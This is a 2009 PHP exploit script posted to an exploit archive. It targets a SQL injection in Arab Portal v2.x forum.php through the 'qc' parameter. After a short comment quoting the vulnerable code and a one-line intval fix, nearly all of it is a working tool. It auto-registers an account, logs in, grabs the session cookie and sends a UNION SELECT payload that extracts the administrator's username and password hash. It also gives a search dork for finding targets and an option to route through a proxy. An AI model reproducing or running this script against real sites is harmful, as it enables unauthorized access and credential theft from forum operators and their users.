arabportal2-sql.txt
Posted on 05 August 2009
<? /* [ Arab Portal v2.x (forum.php qc) SQL Injection Exploit ] [-] Author : rEcruit [-] Mail : recru1t@ymail.com [-] Download : http://arab-portal.net/download.php [-] Vuln in ./forum.php Line: 1503 [code] if((isset($apt->get[qc])) &&(!isset($apt->get[qp]))) { $qc = $apt->get[qc]; $result = $apt->query("select name,comment from rafia_comment where id='$qc'"); $row = $apt->dbarray($result); $apt->row['quote'] = " [QUOTE]..... :".$row['name']." ".$row['comment']."[/QUOTE]"; } [/code] [-] Debug : [code] $qc = intval($apt->get[qc]); [/code] [-] Note : Path to Control Panel "/admin/" . [-] Condition : magic_quotes_gpc = Off */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function Usage() { print " "; print "/------------------------------------------------------------\ "; print "| Arab Portal v2.x (forum.php qc) SQL Injection Exploit | "; print "------------------------------------------------------------/ "; print "| [-] Author : rEcruit | "; print "| [-] Mail : recru1t@ymail.com | "; print "| [-] Greetz : Evil-Cod3r , BlaCK MooN , Fantastic Egypt | "; print "| ALL Sec-Sni.coM Members | "; print "------------------------------------------------------------/ "; print "| [-] Dork : "Powered by: Arab Portal v2" | "; print "| [+] Usage : php Exploit.php HOST PATH Options | "; print "| [-] HOST : Target server (ip/hostname) | "; print "| [-] PATH : Path to Arab Portal | "; print "| [-] Options : | "; print "| =>Proxy :(ex. 0.0.0.0:8080) | "; print "------------------------------------------------------------/ "; print " "; exit; } function Send($Packet,$Payload=false) { Global $host,$proxy; if(empty($proxy)) { $Connect = @fsockopen($host,"80") or die("[-] Bad Host ."); }else{ $proxy = explode(":",$proxy); $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy ."); } $Packet .= "Host : {$host} "; $Packet .= "X-Forwarded-For: 127.0.0.1 "; $Packet .= "Content-Type: application/x-www-form-urlencoded "; $Packet .= "Content-Length: ".(strlen($Payload))." "; $Packet .= "Connection: close "; $Packet .= $Payload; fputs($Connect,$Packet); while(!feof($Connect)) $Response .= @fgets($Connect,2048); fclose($Connect); return $Response; } function SignUp() { GLOBAL $username,$password,$email,$host,$path; $Payload = "username={$username}&password={$password}&password2={$password}&email={$email}&email2={$email}&homepage=http://&viewemail=0&showemail=1&html_msg=0&usertheme=portal&spam=regnotspam&remain=279&post={$email}&left=279&I1.x=72&I1.y=6"; $Packet .= "POST {$path}/members.php?action=insert HTTP/1.1 "; $Packet .= "Referer: http://{$host}/{$path}/members.php?action=signup "; return Send($Packet,$Payload); } function Login_Packet() { GLOBAL $username,$password,$host,$path; $Payload = "username={$username}&userpass={$password}"; $Packet .= "POST {$path}/members.php?action=login HTTP/1.1 "; $Packet .= "Referer: http://{$host}/{$path}/forum.php "; return Send($Packet,$Payload); } function SI_Packet() { GLOBAL $host,$path,$cookie; $Packet .= "GET {$path}/forum.php?action=addcomment&id=1&qc=-999'+UNION+ALL+SELECT+1,concat(0x313a3a,username,0x3a3a,password,0x3a3a)+FROM+rafia_users+where+userid='1 HTTP/1.1 "; $Packet .= "Host : {$host} "; $Packet .= "{$cookie} "; $Packet .= "Referer: http://{$host}/{$path}/forum.php "; return Send($Packet); } function getCookie($Packet) { $lines = explode(" ",$Packet); for($i = 0; $i < sizeof($lines); $i++) { $line = $lines[$i]; if(ereg("PHPSESSID=",$line)) { $cookie = str_replace("Set-Cookie","Cookie",$line); break; } } return $cookie; } if ($argc < 3) Usage(); $host = $argv[1]; $path = $argv[2]; $proxy = $argv[3]; $username = "user".rand(0,10000); $password = "pwd".rand(0,10000); $email = "email".rand(0,10000)."@yahoo.com"; Print " [-] Connecting to {$host} .... "; SignUp(); $cookie = getCookie(Login_Packet()); $data = split("::",SI_Packet()); Print "[-] Username : $data[1] "; Print "[-] Password : $data[2] "; ?>
